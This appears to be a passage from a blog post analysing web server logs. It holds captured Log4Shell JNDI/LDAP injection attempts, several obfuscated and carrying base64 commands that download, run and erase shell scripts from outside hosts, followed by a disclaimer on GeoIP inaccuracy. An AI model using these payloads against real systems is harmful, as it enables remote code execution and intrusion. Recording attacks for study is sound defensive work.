107.77.226.123 - - [14/Jan/2022:22:49:21 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a}"
107.77.106.17 - - [14/Jan/2022:22:55:20 +0000] "GET /?chcxm=${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.17 - - [14/Jan/2022:22:55:20 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a}"
107.77.223.116 - - [15/Jan/2022:18:38:47 +0000] "GET /?obixl=${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.116 - - [15/Jan/2022:18:38:48 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a}"
107.77.70.128 - - [15/Jan/2022:18:45:14 +0000] "GET /?ybwzg=${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.70.128 - - [15/Jan/2022:18:45:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7hgv0bk9oedto5oqal0c8to9yayyyyyn.domsearch.net/a}"
68.183.54.220 - - [16/Jan/2022:21:32:16 +0000] "GET /:80:undefined HTTP/1.1" 302 218 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191.232.194.71:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//191.232.194.71:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGN1cmwgLU8gaHR0cDovLzIuNTYuNTYuMTE3LzhVc0Euc2g7IGNobW9kIDc3NyA4VXNBLnNoOyBzaCA4VXNBLnNo}')"
107.77.224.5 - - [17/Jan/2022:18:14:58 +0000] "GET /?nvfxu=${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.5 - - [17/Jan/2022:18:14:58 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a}"
107.77.76.17 - - [17/Jan/2022:18:20:09 +0000] "GET /?muuxq=${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.17 - - [17/Jan/2022:18:20:09 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7iqqfbk9oea9pvvh9ggc8144xoyyyyyn.domsearch.net/a}"
107.77.226.152 - - [18/Jan/2022:17:12:12 +0000] "GET /?qdokq=${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.152 - - [18/Jan/2022:17:12:12 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a}"
107.77.106.81 - - [18/Jan/2022:17:18:26 +0000] "GET /?eneru=${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.81 - - [18/Jan/2022:17:18:27 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7jevgrk9oecq4ffhi40c8uq9oayyyyyn.domsearch.net/a}"
107.77.226.118 - - [19/Jan/2022:17:43:29 +0000] "GET /?finwj=${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.118 - - [19/Jan/2022:17:43:29 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a}"
107.77.106.132 - - [19/Jan/2022:17:49:30 +0000] "GET /?ubgvg=${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.132 - - [19/Jan/2022:17:49:31 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7k4hfrk9oefcb27hl9gc8wrtoyyyyyyn.domsearch.net/a}"
209.141.47.28 - - [20/Jan/2022:14:07:40 +0000] "GET /$%7Bjndi:ldap://192.3.194.202:8080/o=tomcat%7D HTTP/1.1" 400 347 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64)${jndi:ldap://192.3.194.202:8080/o=tomcat}"
107.77.226.14 - - [20/Jan/2022:17:14:46 +0000] "GET /?oatmh=${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.14 - - [20/Jan/2022:17:14:47 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a}"
107.77.106.35 - - [20/Jan/2022:17:23:17 +0000] "GET /?dthxd=${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.35 - - [20/Jan/2022:17:23:17 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7kp6srk9oe9icp93ct0c8w3g7yyyyyyn.domsearch.net/a}"
107.77.226.231 - - [21/Jan/2022:17:21:40 +0000] "GET /?ehjga=${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.231 - - [21/Jan/2022:17:21:41 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a}"
107.77.106.122 - - [21/Jan/2022:17:27:27 +0000] "GET /?ppoyn=${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.122 - - [21/Jan/2022:17:27:27 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7lecu3k9oec3vvgsdl0c8iqc6eyyyyyn.domsearch.net/a}"
159.223.171.171 - - [21/Jan/2022:21:22:34 +0000] "GET /:undefined HTTP/1.1" 302 215 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13.78.223.142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13.78.223.142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')"
107.77.224.99 - - [22/Jan/2022:19:46:37 +0000] "GET /?wnrtd=${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.99 - - [22/Jan/2022:19:46:37 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a}"
107.77.76.94 - - [22/Jan/2022:19:52:08 +0000] "GET /?abbbr=${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.94 - - [22/Jan/2022:19:52:08 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7m5k5bk9oeesd9jd4o0c8sfwfayyyyyn.domsearch.net/a}"
34.74.41.34 - - [23/Jan/2022:17:31:14 +0000] "GET /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27)&wt=json HTTP/1.1" 302 685 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')"
34.74.41.34 - - [23/Jan/2022:17:31:58 +0000] "GET /solr/admin/collections?action=t(%2527$%257B$%257Benv:BARFOO:-j%257Dndi$%257Benv:BARFOO:-:%257D$%257Benv:BARFOO:-l%257Ddap$%257Benv:BARFOO:-:%257D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%257D%2527)&wt=json HTTP/1.1" 404 220 "http://50.116.41.48/solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27)&wt=json" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')"
107.77.226.9 - - [24/Jan/2022:17:08:18 +0000] "GET /?igqvd=${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.9 - - [24/Jan/2022:17:08:18 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a}"
107.77.106.25 - - [24/Jan/2022:17:14:14 +0000] "GET /?tqroo=${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.25 - - [24/Jan/2022:17:14:14 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7ndeojk9oebfc0r042gc8zpq3yyyyyyn.domsearch.net/a}"
98.0.242.10 - - [26/Jan/2022:16:58:13 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.12.32.14:1389/a}"
98.0.242.10 - - [26/Jan/2022:16:58:13 +0000] "GET / HTTP/1.1" 200 5960 "-" "${jndi:ldap://45.12.32.14:1389/a}"
98.0.242.10 - - [27/Jan/2022:14:53:19 +0000] "GET / HTTP/1.1" 200 96 "${jndi:ldap://45.139.100.173:1389/a}" "${jndi:ldap://45.139.100.173:1389/a}"

Biolerplate GeoIP Disclaimer

Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):

Proxies, VPNs, and Tor

Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.

For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.

httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]

##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU

Vulnerable Servers and Botnets

Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and distort the resulting aggregate data.

Government Interference

It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.

Because most of these agreements are made in private, and due to the fact that most geolocation, RDAP, and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.

Weaknesses or errors in MaxMind, rgeolocate, RDAP, or WHOIS

This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that any false geolocation is being performed by these packages, however.

Also used is the self-reported RDAP or WHOIS systems which can frequently be self-reported falsely or misleadingly. Which of the systems (RDAP, WHOIS, or rgeolocate) used are disclosed when necessary.

Final Note

Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.